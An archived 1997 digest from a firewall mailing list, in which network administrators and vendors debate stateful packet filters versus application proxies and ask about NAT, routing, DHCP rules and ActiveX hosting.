From owner-firewalls-outgoing Mon Jun 9 12:39:30 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA24775 for firewalls-outgoing; Mon, 9 Jun 1997 12:02:34 -0700 (PDT)
Received: from newman (newman.unifiedtech.com [38.251.136.48]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id MAA24731 for ; Mon, 9 Jun 1997 12:02:16 -0700 (PDT)
Received: from newman by newman (SMI-8.6/SMI-SVR4) id PAA11766; Mon, 9 Jun 1997 15:01:13 -0400
Message-ID: <339C52F9.2ADBE22F@unifiedtech.com>
Date: Mon, 09 Jun 1997 15:01:13 -0400
From: Mike Jones
Organization: Unified Technologies, Inc.
X-Mailer: Mozilla 4.0b5C (X11; I; SunOS 5.5.1 sun4u)
MIME-Version: 1.0
To: firewalls@GreatCircle.COM
Subject: Re: Stateful Packet Filters vs. Proxies
X-Priority: 3 (Normal)
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Craig Brozefsky wrote:
> On Mon, 9 Jun 1997, Mike Ordun wrote:
>
> > Have been following this discussion with a lot of interest as a reseller
> > of both SPF and proxy firewalls. I happen to believe that both are
> > appropriate in different circumstances and customer need. Nevertheless, I
> > am a little troubled by the claims that SPFs are inherently
> > insecure. Let me present a challenge. Let's compare some specific
> > commercial offerings -- Firewall-1 in one corner representing SPF and say
> > Gauntlet, Raptor, or ANS in the other representing the proxy approach.
> > What I would like is some specific vulnerability that I cannot protect
> > myself from using the SPF as opposed to the proxy approach. Again just
> > for emphasis, I am interested in specific vulnerabilities not just
> > restatement that in theory proxies are better because they deal with the
> > protocol at the application layer. My somewhat cynical hypothesis, until
> > proven wrong with specific example, is that the majority of proxies are
> > really not better and in fact may be no more than a disguised SPF with
> > address translation.
>
> I gave an example earlier of smapd, and the capabilities it presents.

Let me continue to be a contrarian and claim that mail, like other applications, should not necessarily be handled at all at the firewall. A firewall is first and foremost an access control device, and running an application (even a simple mail forwarder, like smap) is not an optimal use of the firewall. I feel much the same way about http proxying and filtering.

> How about strong authentication at the firewall? Presenting a POP3
> interface that uses APOP?

How about strong authentication? Firewall-1 has offered SecurID authentication for quite a while now.
And I'd rather not have my firewall present a POP3 interface at all, thank you. APOP or no APOP, POP3 isn't exactly a model citizen as a protocol.

> Specific vulnerabilities include buffer overflows in your MTA allowing
> /bin/sh to be executed as that UID. How about the IMAP and POP3 holes
> that were recently published. You could not have exploited these on an
> application based IMAP or POP3 proxy.

You could not exploit them on an SPF, either, since it wouldn't be running the MTA. This (to me) falls into the category of not neglecting security on internal systems just because you have a firewall in place.

> Any buffer overflow or other exploit that would involve the execution of
> /bin/sh (or other shell) via an overflow in a network accessible daemon
> (let's say your POP3 or sendmail daemon) would be foiled by an
> application level. This assumes that it is a true application level
> proxy, like smapd for example from TIS. The reason for this is that
> packets are not passed from the attacker to the victim via the firewall,
> rather the attacker has to interact with the firewall, and the firewall
> then sends separate application level requests to the internal machine
> to perform the desired actions (assuming they fit within the acceptable
> range of actions).

Actually, I think you have it backward. We find ourselves in the enviable position of having most of our proxy-based firewalls written by good people who know what they're doing, thereby having a lot of good proxies (smap being a fine example) to use as examples. However, those proxies theoretically are prone to buffer overflow attacks in the same way as the service daemons they're protecting are. Since an SPF doesn't reassemble or interpret entire service requests, it's immune to (for example) a buffer overflow attack based on the way a particular SMTP command is interpreted.
> One thing to consider when it comes to application level proxies, is that
> not all may perform the same level of 'proxying' as I described
> above (generating their own application level requests within an
> approved range and then packaging the response to send to the original
> requestor). Smapd does this on TIS, I am not sure if http-gw does.

I'd say that a proxy that doesn't do that is hardly worth the name.

--
Mike Jones
Sr. Technology Advisor
UNIFIED Technologies

From owner-firewalls-outgoing Mon Jun 9 12:40:46 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA25950 for firewalls-outgoing; Mon, 9 Jun 1997 12:14:48 -0700 (PDT)
Received: from pse01.pios.com (PSE01.PIOS.COM [199.33.129.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id MAA25943 for ; Mon, 9 Jun 1997 12:14:40 -0700 (PDT)
Received: by pse01.pios.com; (5.65v3.2/1.3/10May95) id AA16003; Mon, 9 Jun 1997 15:15:05 -0400
Received: from vaxd.PIOS.COM (vaxd.PIOS.COM) by gemini.pios.com (PMDF V5.0-6 #18985) id <01IJVG5SVWLC8WWKTS@gemini.pios.com> for firewalls@greatcircle.com; Mon, 09 Jun 1997 15:17:06 -0400 (EDT)
Received: from cal_177.sanjose (192.168.14.7) by PIOS.PIOS.COM (PMDF V5.0-6 #18984) id <01IJVG3BBZDC8Y59LF@PIOS.PIOS.COM> for firewalls@greatcircle.com; Mon, 09 Jun 1997 15:15:06 -0400 (EDT)
Date: Mon, 09 Jun 1997 12:19:20 -0700
From: Bill Stout
Subject: Most common FW Linux?
X-Sender: stoutb@vaxf.pios.com
To: firewalls@greatcircle.com
Message-Id: <2.2.32.19970609191920.0076df14@vaxf.pios.com>
Mime-Version: 1.0
X-Mailer: Windows Eudora Pro Version 2.2 (32)
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7BIT
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

What is the most common make of Linux used for firewalls? Redhat? If so, any technical reasons other than support?
Bill Stout
_____________________________________________________________________________
Bill Stout (Systems Engineer/Consultant)            stoutb@pios.com
Pioneer Standard (Computer Systems & Components)    http://www.pios.com/
San Jose, CA (Location of 1 of 52 U.S. offices)     (408) 954-9100
*My opinions do not reflect that of the company, and vice versa, thankfully.*

From owner-firewalls-outgoing Mon Jun 9 13:12:03 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA23364 for firewalls-outgoing; Mon, 9 Jun 1997 11:55:48 -0700 (PDT)
Received: from ns2.emirates.net.ae (ns2.emirates.net.ae [194.170.1.40]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id LAA23290 for ; Mon, 9 Jun 1997 11:55:27 -0700 (PDT)
Received: from hits-two ([194.170.24.32]) by ns2.emirates.net.ae (SMI-8.6/8.6) with SMTP id WAA22712; Mon, 9 Jun 1997 22:55:39 +0400
Message-Id: <3.0.1.32.19970609224754.0069e2fc@emirates.net.ae>
X-Sender: forster@emirates.net.ae (Unverified)
X-Mailer: Windows Eudora Pro Version 3.0.1 (32)
Date: Mon, 09 Jun 1997 22:47:54 +0400
To: bsdi-users@bsdi.com
From: Andrew & Terri Forster
Subject: TCP/IP Addressing Problems with FireWall
Cc: firewalls@greatcircle.com
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

We purchased a "gauntlet-type" proxy server firewall to complete our perimeter defences project including connection to the Internet. We are having problems of Internal clients being able to see (ping) the Firewall and for the BSDI FireWall box to ping internal machines across our internal router. I have prepared a rough diagram below, then some explanations.
                      I N T E R N E T
                             |
                 +-----------------------+
                 |    Internet Router    |   194.bbb.ccc.1   s/net 255.255.255.0
                 +-----------------------+
                             |
     ------------------------+-----------------------   194.bbb.ccc.* Network
                             |
                 +-----------------------+   Outside 194.bbb.ccc.9   s/net 255.255.255.0
                 |       Firewall        |   Default Router 194.bbb.ccc.1
                 +-----------------------+   Inside  172.17.100.1    s/net 255.255.0.0
                             |
     ------------------------+-----------------------   172.17.*.* Network (B Class)
              |                           |
     +------------------+                 |
     |    W95 Client    |  172.17.30.13   |
     |                  |  B s/net        |
     +------------------+  Gateway 172.17.200.2
                                          |
                          +---------------+---------------+
                          |  172.17.200.2                 |
                          |         Cisco Router          +----- 172.20.*.* (B Class)
                          |  172.16.200.2                 |
                          +---------------+---------------+
                                          |
     ------------------------+-----------------------   172.16.*.* Network (B Class)
                             |
                 +------------------+
                 |    W95 Client    |  172.16.30.11  (Gateway 172.16.200.2)
                 +------------------+

Note this is a test implementation of our final IP addressing Plan. Our registered IP C Class is used on the outside of the FireWall proxy server firewall 194.bbb.ccc.* and on our inside of the Firewall we use a 172.17.*.* B class network to our internal Router which also has other non-internet data feeds (eg 172.20.*.* above). On the inside of this internal router we are planning to use the IP address 172.16.*.* B Class network.

Our problem is that clients on the 172.16.*.* network cannot ping (see) the firewall as its default router (gateway) is set as 194.bbb.ccc.1. Also the clients on the 172.17.*.* network can see the internal network only when the gateway is set as the 172.17.200.2 interface of the Router. Therefore it will not be able to see the Internet as all traffic is sent to the inside not the outside. The other external connections work fine as they all refer to their Internal Router port as their default router (gateway).

Obviously I need to determine how to solve this so that the external traffic is directed to the Internet by the firewall and inside traffic correctly through the Router to the 172.16.*.* subnet.
Any assistance would be appreciated. Thanks in advance.

AMF
==========================================================================
Andrew M Forster [GMT +4]
Email: forster@emirates.net.ae
Phone: +9712 262556 or +9712 453613
Fax: +9712 465344
==========================================================================

From owner-firewalls-outgoing Mon Jun 9 13:55:42 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA02544 for firewalls-outgoing; Mon, 9 Jun 1997 09:55:08 -0700 (PDT)
Received: from cih-gw.cih.com (cih-gw.cih.com [204.69.206.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA02505 for ; Mon, 9 Jun 1997 09:54:57 -0700 (PDT)
Received: (from mail@localhost) by cih-gw.cih.com (8.7.6/8.6.9) id MAA21076; Mon, 9 Jun 1997 12:56:12 -0400
X-Authentication-Warning: cih-gw.cih.com: mail set sender to using -f
Received: from cih-gw.cih.com(204.69.206.1) via SMTP by cih-gw.cih.com, id smtpd21074aaa; Mon Jun 9 16:56:03 1997
Date: Mon, 9 Jun 1997 12:56:03 -0400 (EDT)
From: "Craig I. Hagan"
Reply-To: hagan@cih.com
To: Ryan Russell/SYBASE
cc: Darren Reed , sjg , firewalls
Subject: Re: Stateful Packet Filters vs. Proxies
In-Reply-To: <199706091631.JAA03965@notesgw2.sybase.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> my personal experience has been good.
>
> I disagree that a SPF != a proxy, at least not
> entirely.

you make an interesting argument. I will assert my belief that SPFs and proxies represent something akin to convergent evolution -- are bats special cases of birds, marsupial mice special cases of mice, etc? Admittedly, unlike evolution, we have a situation where people can learn from others' successes and failures. Things may look like ducks, quack like ducks, but if their DNA/source says "not a duck" it ain't a duck.

Why do i believe that they are fundamentally different?
SPFs are implemented as an adjunct to the IP stack of the machine -- basically it requires down and dirty OS level code in order to operate. Proxies don't. Merely because the SPF looks and acts like a dumb proxy doesn't make it a dumb proxy -- nor does it make dumb proxies special cases of SPF's.

Now, an important adjunct: i'm merely addressing your assertion that SPFs and proxies belong to the same family of things, be it SPFs being special cases of proxies, or vice versa. I believe that the arguments over which is more secure are beyond the scope of this reply, and have more to do with availability and ease of modifying the source code to both (i'd rather an SPF with rebuildable source than a proxy w/o it). Of course, there are many other factors to add into this equation, but, i'm digressing and risking flamage :)

-- craig

-------------------------------------------------------------------------------
Craig I. Hagan      "It's a small world, but I wouldn't want to back it up"
hagan@cih.com       "True hackers don't die, their ttl expires"
                    "It takes a village to raise an idiot, but an idiot can raze a village"

From owner-firewalls-outgoing Mon Jun 9 14:11:10 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA18956 for firewalls-outgoing; Mon, 9 Jun 1997 11:32:03 -0700 (PDT)
Received: from grab (grab.coslabs.com [199.233.92.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id LAA18938 for ; Mon, 9 Jun 1997 11:31:56 -0700 (PDT)
Received: from future.mulligan.com by grab (SMI-8.6/SMI-SVR4) id MAA16831; Mon, 9 Jun 1997 12:32:40 -0600
Received: from future by future.mulligan.com (SMI-8.6/SMI-SVR4) id MAA02438; Mon, 9 Jun 1997 12:32:37 -0600
Message-Id: <199706091832.MAA02438@future.mulligan.com>
X-Mailer: exmh version 2.0gamma 1/27/96
To: "Kelly E. Gibbs"
cc: Ryan Russell/SYBASE , Bill Stout , firewalls
Subject: Re: Stateful Packet Filters vs. Proxies
In-reply-to: Your message of "Fri, 06 Jun 1997 18:51:55 PDT."
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 09 Jun 1997 12:32:37 -0600
From: Geoff Mulligan
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

kgibbs@best.com said:
> At what level does the NAT occur in the OSI model? So far I've heard
> 2 and 4... what's the right answer?

NAT happens at the IP address level and requires modification to the IP and TCP/UDP headers. It may also require changes to the application data, as in FTP when the IP address (or port) is embedded in the application data.

geoff

From owner-firewalls-outgoing Mon Jun 9 14:24:44 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA13311 for firewalls-outgoing; Mon, 9 Jun 1997 08:08:44 -0700 (PDT)
Received: from newman (newman.unifiedtech.com [38.251.136.48]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id IAA13303 for ; Mon, 9 Jun 1997 08:08:36 -0700 (PDT)
Received: from newman by newman (SMI-8.6/SMI-SVR4) id LAA06103; Mon, 9 Jun 1997 11:07:26 -0400
Message-ID: <339C1C2E.F67342F@unifiedtech.com>
Date: Mon, 09 Jun 1997 11:07:26 -0400
From: Mike Jones
Organization: Unified Technologies, Inc.
X-Mailer: Mozilla 4.0b5C (X11; I; SunOS 5.5.1 sun4u)
MIME-Version: 1.0
To: Darren Reed
CC: firewalls@GreatCircle.COM
Subject: Re: Stateful Packet Filters vs. Proxies
X-Priority: 3 (Normal)
References: <199706091435.KAA04949@newman>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Darren Reed wrote:
> In some mail from Mike Jones, sie said:
> > Darren Reed wrote:
> > > Add to this discussion that, to date, SPF's (and in-kernel proxies) have
> > > yet to be proven to be as reliable as real proxies. There have been
> > > cases emerge here in which the flaws in current implementations (of SPFs)
> > > became evident.
> > Details, please? Which flaws? What cases?
> > This is clearly the conventional wisdom, but details are very hard to come by.
> >
> > I'll admit right up front that I'm interested because we sell
> > FW-1; if there are serious problems with the product, I want to
> > know so I can stop recommending it to people.
> In several reports, last year, it became apparent that Gauntlet (and
> I suspect the FWTK) would not work with FW1 because the "PORT" command
> was split over two packets (although this is now claimed to be fixed).

I'm not entirely sure what you're trying to say here. Why would you want Gauntlet to work with FW1? Is it that someone behind a FW1 could not ftp to a server behind a Gauntlet? Be that as it may, this was a bug and it was fixed. It was *not* a security hole, in that it did not permit something that should have been denied.

> The point being, FW1 doesn't try to recreate the upper layers of data
> properly, so anything which doesn't fit in one packet requires them to
> provide "special case handling". What they (and consumers) don't seem to
> realise that all of TCP is a "special case". Consequently, their entire
> suite of TCP proxies could be considered to be "flawed".
> If you're curious about "how", then look at the Linux FTP masquerade
> code - it too looks for everything in one packet (when I last looked).

I don't follow you at all, I'm afraid. You're concluding that the entire product is flawed based on theoretically projecting one actual bug. I'm rather more interested in real security flaws. Your original message indicated multiple flaws and multiple cases pointing them out. This is a common claim, but whenever I've asked for details it always seems to turn into anecdotal evidence. I've always been a believer in the principle that the plural of "anecdote" is not "data", so I remain curious, but unconvinced.

--
Mike Jones
Sr. Technology Advisor
UNIFIED Technologies

From owner-firewalls-outgoing Mon Jun 9 15:12:38 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA08368 for firewalls-outgoing; Mon, 9 Jun 1997 13:41:12 -0700 (PDT)
Received: from bizet.videotron.net (bizet.videotron.net [205.151.222.75]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA08128 for ; Mon, 9 Jun 1997 13:40:07 -0700 (PDT)
Received: from vldejqqt (ppp096.216.msherb.videotron.net [207.96.216.96]) by bizet.videotron.net (8.8.5/8.8.2) with ESMTP id QAA04207 for ; Mon, 9 Jun 1997 16:40:41 -0400 (EDT)
Message-Id: <199706092040.QAA04207@bizet.videotron.net>
From: "Smoothy"
To:
Subject: Ethical problems...
Date: Mon, 9 Jun 1997 16:44:01 -0400
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1155
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello,

I'm presently looking to establish which confusions all the security mechanisms can involve in opposition with the ethics. If any ideas came to your mind... would u please send them to my email address: smoothy@videotron.ca.

Example: a lot of firewalls need to decrypt a mail to check for viruses in it, but that is directly in opposition to confidentiality.

Tx to all of u!

Stéphane Routhier
Bombardier Inc.
Division Sea-Doo/Ski-doo

From owner-firewalls-outgoing Mon Jun 9 15:33:15 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA18703 for firewalls-outgoing; Mon, 9 Jun 1997 11:30:09 -0700 (PDT)
Received: from grab (grab.coslabs.com [199.233.92.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id LAA18693 for ; Mon, 9 Jun 1997 11:30:03 -0700 (PDT)
Received: from future.mulligan.com by grab (SMI-8.6/SMI-SVR4) id MAA16828; Mon, 9 Jun 1997 12:30:38 -0600
Received: from future by future.mulligan.com (SMI-8.6/SMI-SVR4) id MAA02426; Mon, 9 Jun 1997 12:30:22 -0600
Message-Id: <199706091830.MAA02426@future.mulligan.com>
X-Mailer: exmh version 2.0gamma 1/27/96
To: "Simon J. Gerraty"
cc: Ryan Russell/SYBASE , firewalls@greatcircle.com
Subject: Re: Stateful Packet Filters vs. Proxies
In-reply-to: Your message of "Sat, 07 Jun 1997 16:19:41 +1000." <199706070619.QAA25566@zen.quick.com.au>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 09 Jun 1997 12:30:22 -0600
From: Geoff Mulligan
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

sjg@quick.com.au said:
> One thing to note - SPF and crypto do not mix.

What! Certainly SPF and crypto do mix. Take a look at Sunscreen. It is a stateful packet screen AND supports strong crypto through the use of SKIP.

Maybe you meant to say that NAT and crypto do not mix, but again, depending on the configuration, NAT and crypto can be used together. Again, check out Sunscreen from Sun: www.sun.com/security or www.sunscreen.com

And Ryan, Sunscreen SPF does support NAT in a bridging environment.
geoff

From owner-firewalls-outgoing Mon Jun 9 15:38:49 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA12370 for firewalls-outgoing; Mon, 9 Jun 1997 14:05:08 -0700 (PDT)
Received: from eclipse.ncmi-gsl.com (postoffice.ncmi-ny.com [206.25.169.25]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id OAA12341 for ; Mon, 9 Jun 1997 14:04:57 -0700 (PDT)
Received: from ny_nx_mail1.ncmi-gsl.com by eclipse.ncmi-gsl.com (8.7.5/8.7.3) with SMTP id QAA01057; Mon, 9 Jun 1997 16:44:46 -0400 (EDT)
Received: from cygni by ny_nx_mail1.ncmi-gsl.com (NX5.67f2/NX3.0M) id AA02756; Mon, 9 Jun 97 16:44:45 -0400
Message-Id: <9706092044.AA02756@ny_nx_mail1.ncmi-gsl.com>
Received: by cygni.ncmi-ny.com (NX5.67f2/NX3.0X) id AA01429; Mon, 9 Jun 97 16:44:45 -0400
Content-Type: text/plain
Mime-Version: 1.0 (NeXT Mail 3.3 v118.2)
Received: by NeXT.Mailer (1.118.2)
From: Donald Branch
Date: Mon, 9 Jun 97 16:44:44 -0400
To: firewall@GretCircle.COM
Subject: DHCP and Firewall 1
Cc: firewalls
References: <199706091953.MAA17398@notesgw2.sybase.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Let me restate my previous DHCP and Firewall 1 question. I have a Windows NT machine running DHCP. I want that one machine to be able to get out to AOL, but since its IP address keeps changing I can't make a rule based on his IP address. I do not want to open up the port that AOL uses to the world, just to one machine. Anyone have any ideas? They would be appreciated.
Donald Branch
Unix Sys Admin

From owner-firewalls-outgoing Mon Jun 9 16:23:42 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA02168 for firewalls-outgoing; Mon, 9 Jun 1997 09:52:07 -0700 (PDT)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA02140 for ; Mon, 9 Jun 1997 09:51:58 -0700 (PDT)
Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id JAA23371 for ; Mon, 9 Jun 1997 09:56:10 -0700 (PDT)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA04349; Mon, 9 Jun 97 09:53:59 PDT
Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id JAA05491 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Mon, 9 Jun 1997 09:52:50 -0700 (PDT)
Message-Id: <199706091652.JAA05491@notesgw2.sybase.com>
Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id AB84F09A9593170B882564B1005CC9D8; Mon, 9 Jun 97 09:52:48 EDT
To: "Craig I. Hagan"
Cc: firewalls
From: Ryan Russell/SYBASE
Date: 9 Jun 97 9:58:45 EDT
Subject: Re: Stateful Packet Filters vs. Proxies
X-Lotus-Type: Reply All
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Source-code review - You think that SPFs don't have source code? Or do you take issue that the two main SPF vendors (Checkpoint and Cisco) don't provide source code for review?

Black-box testing - FW1 runs on a number of different OSes, though with a portion that is OS-specific in each case. Because of their nature, SPFs have to replace some portion of the host OS, and rely less on the host OS than a proxy. Some people think this is a good thing, given the number of OS problems out there.

I'm not sure what the point of your performance question is, since that isn't a security question, but SPFs will perform better than proxies, in general.
Ryan

---------- Previous Message ----------
To: avalon
cc: Ryan.Russell, sjg, firewalls
From: hagan@cih.com ("Craig I. Hagan") @ smtp
Date: 06/09/97 11:07:14 AM
Subject: Re: Stateful Packet Filters vs. Proxies

agreed. if i may extend your point, it is also easier to verify a proxy agent than it is an SPF as you have many more controls that you can use in your experiment:

* source code review
* easier black box testing - you can move the proxy agent through a set of known operating systems to reduce the amount of possible os contamination in your tests

my issues with SPFs aren't that they can't be secure, but, that they are being mismarketed. i don't think that everyone needs maximal security, but, people should understand the tradeoffs that they are making when they choose technology A over B, e.g. choosing an SPF (or similar strategy) over a proxy.

> And whilst "anything is possible", current SPF technology does not yet
> appear to have advanced far enough to allow them to work as universally
> well as proxies.

I would like to see what the cpu requirements would be to f/w a T3, 100mb ethernet, and (where possible) 1gb ethernet connections using proxies on the following (optimally configured, of course):

* commercial unix hw+sw (e.g. sun, alpha +osf/1)
* commercial unix sw + pc hw (e.g. stuff like solaris x86, bsdi)
* commercial hw + PD unices (e.g. alpha+linux/*bsd; sun+linux/*bsd, etc)
* pc hw, pd unix (pc+linux/*bsd, etc)

but, hey, that is wishful thinking on my part :)

-- craig
-------------------------------------------------------------------------------
Craig I. Hagan "It's a small world, but I wouldn't want to back it up"
hagan@cih.com "True hackers don't die, their ttl expires"
"It takes a village to raise an idiot, but an idiot can raze a village"

From owner-firewalls-outgoing Mon Jun 9 16:35:10 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA15205 for firewalls-outgoing; Mon, 9 Jun 1997 14:26:45 -0700 (PDT)
Received: from mail.ruhrgebiet.individual.net (in-ruhr.ruhr.de [141.39.224.38]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id OAA15191 for ; Mon, 9 Jun 1997 14:26:37 -0700 (PDT)
Received: (from admin@localhost) by mail.ruhrgebiet.individual.net (8.8.5/8.8.5) with UUCP id WAA20063 for firewalls@GreatCircle.COM; Mon, 9 Jun 1997 22:26:19 +0200 (MET DST)
Received: from hostname.devnull.ruhr.de (benedikt@hostname.devnull.ruhr.de [192.168.122.11]) by devnull.local.net (8.6.12/8.6.9) with ESMTP id LAA01335 for ; Mon, 9 Jun 1997 11:36:33 +0200
Received: (from benedikt@localhost) by hostname.devnull.ruhr.de (8.7.5/8.7.3) id LAA00681; Mon, 9 Jun 1997 11:52:53 +0200
To: firewalls@GreatCircle.COM
Subject: Re: Hosting ActiveX applets
References:
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
From: Benedikt Stockebrand
Date: 09 Jun 1997 11:52:52 +0200
In-Reply-To: Kevin McPeake's message of Sun, 8 Jun 1997 00:54:04 +0200 (MET DST)
Message-ID: <87pvtw9k7f.fsf@devnull.ruhr.de>
Lines: 22
X-Mailer: Gnus v5.3/Emacs 19.34
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Kevin McPeake writes:
> Can someone tell me if there's any good reasons why we should not allow
> ActiveX on our Web server to be served to visiting web browsing clients?

Ask your lawyer about liability issues. If a malicious site abuses some security holes in your applets you may get into a bit of trouble. At least if you're in the US I think this alone should be reason enough not to host any ActiveX applets.
Aside from legal issues you may want to consider the PR impact if it was publicly known that your site hosted an ActiveX applet that got exploited by someone else.

Ben
--
Ben(edikt)? Stockebrand Runaway ping.de Admin---Never Ever Trust Old Friends
My name and email address are not to be added to any list used for advertising purposes. Any sender of unsolicited advertisement e-mail to this address implicitly agrees to pay a DM 500 fee to the recipient for proofreading services.

From owner-firewalls-outgoing Mon Jun 9 16:36:35 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA18139 for firewalls-outgoing; Mon, 9 Jun 1997 11:26:21 -0700 (PDT)
Received: from grab (grab.coslabs.com [199.233.92.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id LAA17971 for ; Mon, 9 Jun 1997 11:25:43 -0700 (PDT)
Received: from future.mulligan.com by grab (SMI-8.6/SMI-SVR4) id MAA16791; Mon, 9 Jun 1997 12:26:13 -0600
Received: from future by future.mulligan.com (SMI-8.6/SMI-SVR4) id MAA02413; Mon, 9 Jun 1997 12:26:08 -0600
Message-Id: <199706091826.MAA02413@future.mulligan.com>
X-Mailer: exmh version 2.0gamma 1/27/96
To: Ryan Russell/SYBASE
cc: "Kelly E. Gibbs" , Bill Stout , firewalls
Subject: Re: Stateful Packet Filters vs. Proxies
In-reply-to: Your message of "06 Jun 1997 20:04:23 EDT." <199706070257.TAA09836@notesgw2.sybase.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 09 Jun 1997 12:26:08 -0600
From: Geoff Mulligan
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Ryan.Russell@sybase.com said:
> Well, the NAT I'm talking about specifically (IP NAT products like the
> ones from Checkpoint and Cisco, and probably others) work at layer 4.
> They need to understand TCP and so-forth. One could write one that
> works strictly at layer 3, but for many IP protocols it wouldn't work
> very well, and certainly wouldn't work for many-to-few NAT
> implementations.
One cannot write a NAT that functions only at layer 3 - IP (if you are referring to the ISO layering labels). Any change of address in the IP header cascades into the pseudo header in UDP and TCP and must be reflected in a change in their checksums.

geoff

From owner-firewalls-outgoing Mon Jun 9 16:36:34 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA28811 for firewalls-outgoing; Mon, 9 Jun 1997 12:38:44 -0700 (PDT)
Received: from oisin.integration.adnc.com (oisin.adnc.com [205.216.138.42]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA28774 for ; Mon, 9 Jun 1997 12:38:31 -0700 (PDT)
Received: from chuchullain.adnc.com ([205.216.138.81]) by oisin.integration.adnc.com (Post.Office MTA v3.1 release PO203a ID# 197-34225U100L100S0) with SMTP id AAA279; Mon, 9 Jun 1997 12:42:13 -0700
Date: Mon, 9 Jun 97 12:31:31 PDT
From: Tom Byrnes
Subject: RE: Does Raptor WebNOT Block Legitimate Sites?
To: "2LT Jeffery J. Lowder, 333-4615" , "bpetrie@incc.net" , "firewalls@greatcircle.com" , "raptor-list@udc.com" , "'Allen Rogers'" , Tim Thayer
X-Mailer: Chameleon ATX 6.0.1, Standards Based IntraNet Solutions, NetManage Inc.
X-Priority: 3 (Normal)
References: <01BC6F68.54F8BA80@ss1011-tt.bbtnet.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I don't know if WebNOT does, but it's par for the course that URL blockers block a lot more than just porn. That's the problem with censorship: by basing our standards on "protecting children" we wind up with only those discussions and topics fit for a child (and by that I mean a 5 year old. Only in the US are teenagers considered children.)

Check out: http://www.wired.com/news/politics/story/3229.html

and then join the EFF, get rid of your URL blockers, and use measures of productivity to figure out who is playing when they should be working, and your logs to find subversion.
If you treat your people like adults, they'll (for the most part) behave like it. The few who don't will be easy to spot.

It's amazing how, having won the cold war, we have become that which we fought.

---
On Mon, 2 Jun 1997 15:19:12 -0400 Tim Thayer wrote:

> Allen, any movement on this issue? We are still getting complaints from users. The most recent was URL: www.emeregency.com
>
> Tim Thayer
> Information Security
> Branch Banking & Trust
>
> >Date: Tue, 11 Mar 1997 08:21:10 -0500 (EST)
> >X-Sender: arogers@raptor1.raptor.com (Unverified)
> >To: "2LT Jeffery J. Lowder, 333-4615" ,
> > , ,
> >From: Allen Rogers
> >Subject: Re: Does Raptor WebNOT Block Legitimate Sites?
> >
